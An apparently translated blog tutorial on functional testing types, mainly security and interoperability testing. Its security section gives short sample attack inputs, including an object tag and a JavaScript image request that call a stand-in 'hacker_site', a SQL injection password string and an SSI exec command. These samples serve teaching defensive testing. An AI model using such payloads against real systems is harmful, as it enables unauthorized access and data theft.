Today we will take a closer look at the functional types of testing and everything related to them.
All kinds of software testing, depending on the objectives pursued, can be conditionally divided into the following groups:
– Related to the changes.
In our next articles, we will try to tell you about each individual type of testing, its purpose and use when testing the software in more detail.
Functional types of testing
Functional tests are based on functions and features, as well as interaction with other systems, and can be presented at all levels of testing: Component / Unit testing, Integration testing, System testing and Acceptance testing ). Functional types of testing consider the external behavior of the system. Let’s list some of the most common types of functional tests:
- Functional testing
- Security and Access Control Testing
- Interoperability Testing
Functional testing considers the predefined behavior and is based on an analysis of the specification of the functionality of the component or the system as a whole.
Functional tests are based on the functions performed by the system, and can be performed at all levels of testing (component, integration, system, acceptance). Typically, these functions are described in terms of requirements, functional specifications, or in cases of use of the system (use cases).
Functional testing can be carried out in two aspects:
– business processes
Testing in the future “requirements” uses the specification of functional requirements for the system as a basis for the design of test cases. In this case, it is necessary to make a list of what will be tested and what not to prioritize requirements based on risks (if this is not done in the requirements document), and on this basis prioritize test cases. This will allow you to focus and not miss out on testing the most important functionality.
Testing in the long term “business processes” uses knowledge of these very business processes, which describe the scenarios of the daily use of the system. In this perspective, test scenarios (test scripts), as a rule, are based on cases of use of the system (use cases).
Benefits of functional testing:
– simulates the actual use of the system;
Disadvantages of functional testing:
– the possibility of omitting logical errors in the software;
– the probability of excessive testing.
Automation of functional testing is quite common.
Security and Access Control Testing
Security testing is a testing strategy that is used to check the security of the system, as well as to analyze the risks associated with ensuring a holistic approach to application security, hacker attacks, viruses, unauthorized access to confidential data.
Principles of Software Security
The overall security strategy is based on three basic principles:
Confidentiality is the concealment of certain resources or information. Confidentiality can be understood as restricting access to a resource of a certain category of users, or in other words, under what conditions a user is authorized to access this resource.
There are two main criteria for determining the concept of integrity:
- Confidence. It is expected that the resource will be changed only in the appropriate way by a certain group of users.
- Damage and recovery. In the event that the data is corrupted or incorrectly changed by an authorized or unauthorized user, you must determine how important the recovery procedure is.
Availability is the requirement that resources should be available to an authorized user, internal object, or device. Typically, the more critical a resource, the higher the level of availability should be.
Types of vulnerabilities
Currently, the most common types of software security vulnerabilities are:
- XSS (Cross-Site Scripting) is a kind of vulnerability of software (Web applications), in which malicious scripts are executed on a server generated page, in order to attack a client.
- XSRF / CSRF (Request Forgery) is a type of vulnerability that allows exploiting the disadvantages of the HTTP protocol, while the attackers work according to the following scheme: a link to a malicious site is installed on a page that is trusted by the user, when a malicious link is passed, a script is executed that stores personal data (passwords, payment details, etc.), or sending SPAM messages on behalf of the user, or changing access to the user account to gain full control over it.
- Code injections (SQL, PHP, ASP, etc.) is a kind of vulnerability where it becomes possible to run executable code in order to gain access to system resources, unauthorized access to data or disabling the system.
- Server-Side Includes (SSI) Injection is a type of vulnerability that uses the insertion of server commands into HTML code or running them directly from the server.
- Authorization Bypass is a type of vulnerability in which it is possible to gain unauthorized access to an account or documents of another user.
How to test software for security?
Here are some examples of software testing for vulnerability in the security system. To do this, you need to check your software for known types of vulnerabilities:
XSS (Cross-Site Scripting)
By themselves, XSS attacks can be very diverse. Attackers can try to steal your cookies, redirect you to a site where a more serious attack will occur, download any malicious object into memory, etc., just placing a malicious script on your site. As an example, you can consider the following script that displays your cookies on the screen:
or a script that redirects to the infected page:
or creating a malicious object with a virus, etc.:
<object type=”text/x-scriptlet” data=”http://hacker_site”></object>
XSRF / CSRF (Request Forgery)
var foo = new Image();
foo.src = “http://hacker_site/?command”;
Code injections (SQL, PHP, ASP, etc.)
For an insertion of executable code, consider the example of the SQL code.
The login form has 2 fields – name and password. Processing takes place in the database through execution of the SQL query:
WHERE Name = ‘tester’
AND Password = ‘testpass’;
Enter the correct name ‘tester’, and in the password field enter the line:
testpass’ OR ‘1’=’1
As a result, if the field does not have the appropriate validation or data handlers, a vulnerability can be opened that allows entering a password-protected system, since the SQL query will take the following form:
WHERE Name = ‘tester’
AND Password = ‘testpass’ OR ‘1’=’1′;
The condition ‘1’ = ‘1’ will always be true and therefore the SQL query will always return many values.
Server-Side Includes (SSI) Injection
Depending on the type of operating system, the commands may be different, as an example, consider a command that displays a list of files on Linux OS:
<! – # exec cmd = “ls” ->
User A can access the documents of user B. Assume there is an implementation where when viewing your profile containing confidential information, the userID is passed to the page URL, and in this case it makes sense to try substituting the number of another user for your userID. And if you see his data, then you have found a defect.
There are a lot of examples of vulnerabilities and attacks. Even after a full cycle of security testing, you can not be 100% sure that the system is really safe. But you can be sure that the percentage of unauthorized intrusions, theft of information and data loss will be several times less than those who did not conduct security testing.
With the development of network technologies and the Internet, the interaction of different systems, services and applications with each other has acquired considerable relevance, since any problems connected with this can lead to a loss of the company’s authority, which as a result will entail financial losses. Therefore, the testing of interaction should be approached with all seriousness.
Interoperability Testing is a functional test that verifies the ability of an application to interact with one or more components or systems and includes compatibility testing and integration testing.
Software with good interaction characteristics can be easily integrated with other systems without requiring any major modifications. In this case, the number of changes and the time required to perform them can be used to measure the possibility of interaction.
Stay tuned and continue to learn useful details about the software testing with us.